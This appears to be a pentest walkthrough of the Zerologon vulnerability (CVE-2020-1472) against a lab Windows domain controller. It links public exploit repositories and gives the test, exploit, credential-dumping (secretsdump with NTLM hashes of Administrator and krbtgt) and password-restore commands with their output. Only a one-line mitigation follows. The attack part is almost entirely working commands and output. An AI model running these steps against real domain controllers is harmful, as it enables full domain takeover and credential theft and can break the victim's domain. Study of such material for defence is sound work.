Net Zero Logon CVE-2020-1472

sweps

Net Zero Logon vulnerability CVE-2020-1472 lies in the domain controller logon process and allows an attacker to set the logon to null. This is a very dangerous attack as not only can the attacker gain full domain compromise, they can crumble the entire domain if the password is not restored. For this reason it is recommended to only run the test script in a pentest to verify the domain controller is vulnerable. Microsoft released a patch in 2020.

The test script can be cloned from:

https://github.com/SecuraBV/CVE-2020-1472

The poc can be cloned from:

https://github.com/dirkjanm/CVE-2020-1472

Testing for the vulnerability

python3 zerologon_tester.py SERVER2019 192.168.1.50
Performing authentication attempts...
====================================================================================================================================================================================================================================================================================================
Success! DC can be fully compromised by a Zerologon attack.

Exploiting the vulnerability

python3 zero_logoncheck.py SERVER2019 192.168.1.50
Performing authentication attempts...
===============================================================================================================================================================================================================================================================
Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!

Post exploit looting

secretsdump.py -just-dc PWNME/SERVER2019\$@192.168.1.50
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
pwnme.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4eee7449c5c6f03e7e7361d2f7e0a16d:::
</snip>

Restoring the password

To restore the Domain controllers password, run secretsdump with the administrators hash and copy the “plain_password_hex” address in the resulting text.

secretsdump.py administrator@192.168.1.50 -hashes aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[*] Target system bootKey: 0x72d243dfa0e057c976342f73088a46d0
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
PWNME0\SERVER2019$:aes256-cts-hmac-sha1-96:caa063731e21ba52be7259c75266992af3f2dff849b59fa230540d645846d982
PWNME0\SERVER2019$:aes128-cts-hmac-sha1-96:ca18541241a4e68554e8c106f15114f0
PWNME0\SERVER2019$:des-cbc-md5:fe67f486efd35838
PWNME0\SERVER2019$:plain_password_hex:6fe613775a747c5883b6d25904da6cdec58697ff4ac926a1be926fe5c560
648b9ad35b6c73a2d8840f2104a199a5687935d8533c4036a89b7a82ea2a00aa96b2cb5110bd9a8d1d4d5e291b8226e4ff
def0af253d2c39fec71f200d6b4dc943fa932f22391f628d8a1674bfb16067db8ccb68db3f95fdbdda16149d02e1f89b28
523a82171e09ab17bd55abb3a3b637a5a938918944e1317d4ac18230eab0c34b53b3f7aa5d3e2889159def0d342eb27007
1f120e8d96f7582992920a1ee5aaa7fa99479d541d255f0f21bc5760674cf5f262d5c6ff982c492f2d30d66504a5711661
909b1a4fdd55639686a812a2853a

Use the hex string to restore the password

python3 restorepassword.py PWNME/SERVER2019@SERVER2019 -target-ip 192.168.1.50 -hexpass 6fe613775a
747c5883b6d25904da6cdec58697ff4ac926a1be926fe5c560648b9ad35b6c73a2d8840f2104a199a5687935d8533c4036
a89b7a82ea2a00aa96b2cb5110bd9a8d1d4d5e291b8226e4ffdef0af253d2c39fec71f200d6b4dc943fa932f22391f628d
8a1674bfb16067db8ccb68db3f95fdbdda16149d02e1f89b28523a82171e09ab17bd55abb3a3b637a5a938918944e1317d
4ac18230eab0c34b53b3f7aa5d3e2889159def0d342eb270071f120e8d96f7582992920a1ee5aaa7fa99479d541d255f0f
21bc5760674cf5f262d5c6ff982c492f2d30d66504a5711661909b1a4fdd55639686a812a2853a

Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[*] StringBinding ncacn_ip_tcp:192.168.1.50[49681]
Change password OK

Mitigation

Patch from Microsoft